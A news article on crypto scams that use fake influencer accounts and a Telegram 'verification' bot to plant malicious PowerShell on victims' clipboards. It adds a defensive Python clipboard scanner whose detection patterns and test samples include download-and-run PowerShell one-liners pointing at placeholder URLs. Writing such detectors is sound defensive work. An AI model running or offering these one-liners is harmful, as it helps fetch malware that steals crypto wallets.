A new wave of crypto scams has emerged, with attackers using fake X accounts to impersonate popular influencers and lure unsuspecting users into fraudulent Telegram groups.
Users are then tricked into installing malware that compromises crypto wallet data.
Scammers move beyond simple phishing
According to blockchain security firm Scam Sniffer, scammers comment on legitimate posts, luring users with offers of exclusive investment information and “alpha” advice. Once people join these Telegram groups, they are immediately asked to undergo a verification process by a bot called OfficiaISafeguardBot.
The bot creates a false sense of urgency and pushes users to quickly complete the verification. However, this seemingly harmless step is a trap: upon completing the verification, the bot injects malicious PowerShell code into the user’s clipboard. When executed, the code downloads malware designed to compromise the system and steal sensitive data, including crypto wallet information.
Scam Sniffer said the malware has been flagged by VirusTotal as harmful, and previous cases of similar attacks have resulted in private keys being stolen, leading to significant financial losses.
“This represents a new evolution in crypto scams: moving beyond simple phishing to combine social engineering with malware. Stay tuned and share to protect others.”
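As an added illustration (not code from Scam Sniffer or from the original article), the following Python sketch shows one way a defender could screen clipboard text for the download-and-run PowerShell pattern described above before it is ever pasted into a terminal. The indicator names, the scoring rule and the sample strings are assumptions constructed for this example; the `example.invalid` URLs are placeholders.

```python
import base64
import re

# Heuristic indicators of a download-and-run one-liner (choices made for this example).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:in(?:dowstyle)?)?\s+(?:hidden|1)\b", re.I),
    "download": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                           r"downloadstring|downloadfile|start-bitstransfer)\b", re.I),
    "execute": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I),
}
# -EncodedCommand (commonly shortened to -enc or -e) carries base64 of a UTF-16LE script.
ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(text):
    """Return the script hidden in an encoded-command argument, or None."""
    m = ENCODED.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers bad base64 and bad UTF-16
        return None

def inspect_clipboard_text(text):
    """Return sorted indicator names found in the text and in any decoded payload."""
    hits = set()
    inner = decode_encoded_command(text)
    if inner is not None:
        hits.add("encoded_command")
    for blob in filter(None, (text, inner)):
        hits.update(name for name, rx in INDICATORS.items() if rx.search(blob))
    return sorted(hits)

def is_suspicious(text):
    """A 'verification' step never needs an encoded command or download plus execute."""
    hits = set(inspect_clipboard_text(text))
    return "encoded_command" in hits or {"download", "execute"} <= hits

def _encode(script):
    """Helper used only to build the constructed encoded sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed samples, not taken from the campaign described in the article.
SAMPLE_PLAIN = 'powershell -w hidden -c "iex (iwr https://example.invalid/verify.ps1)"'
SAMPLE_ENCODED = "powershell -NoProfile -enc " + _encode("irm https://example.invalid/v | iex")
SAMPLE_BENIGN = "Get-ChildItem -Path C:\\Users -Recurse"

if __name__ == "__main__":
    for sample in (SAMPLE_PLAIN, SAMPLE_ENCODED, SAMPLE_BENIGN):
        print(is_suspicious(sample), inspect_clipboard_text(sample))
```

The same patterns can be applied to PowerShell script block logs after the fact; a match is a reason to stop and investigate, not proof of compromise.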
Scams rampant
Last month, Casa CEO Nick Neuman shared a chilling story about a phishing scam he ran into. In a post on X, Neuman described a call he received from a scammer pretending to be a Coinbase support agent. The scammer claimed that Neuman’s password change request had been canceled and encouraged him to click on a link in a suspicious email.
When Neuman began questioning the scammer, they dropped the act and revealed the true nature of the operation. The scammer boasted that he had recently stolen $35,000 from a victim and made it clear that the scam only targets wealthy crypto investors.
Most recently, a crypto user with the pseudonym “LeftsideEmiri” reported losing $300,000 due to a social engineering attack. According to the user, the attack started when they received a message containing a link to a KakaoTalk conversation, which was allegedly for a partnership meeting. Although the link appeared to be broken, the user clicked on it, believing it to be harmless.
In retrospect, they suspect that clicking the link led to the installation of malware, which compromised their Ethereum and Solana wallets, along with other wallets. The user made it clear that they had not approved or signed any transactions, indicating that the attack was covert and used social engineering techniques to steal funds.